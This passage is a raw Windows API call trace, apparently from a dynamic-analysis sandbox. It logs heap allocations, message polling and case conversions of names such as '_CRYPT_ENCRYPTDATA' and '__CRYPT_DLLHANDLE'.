HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0085.392] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0085.393] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0085.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0085.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42400) returned 0x49aa010 [0085.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0085.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0085.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0085.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0085.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0085.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42400) returned 0x43fd3b8 [0085.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0085.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0085.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0085.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0085.399] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0085.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0085.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0085.399] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0085.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0085.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0085.400] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0085.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0085.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0085.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0085.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0085.400] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0085.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0085.401] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0085.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0085.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0085.402] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0085.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0085.402] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0085.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0085.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0085.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0085.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0085.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0085.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0085.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0085.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0085.406] 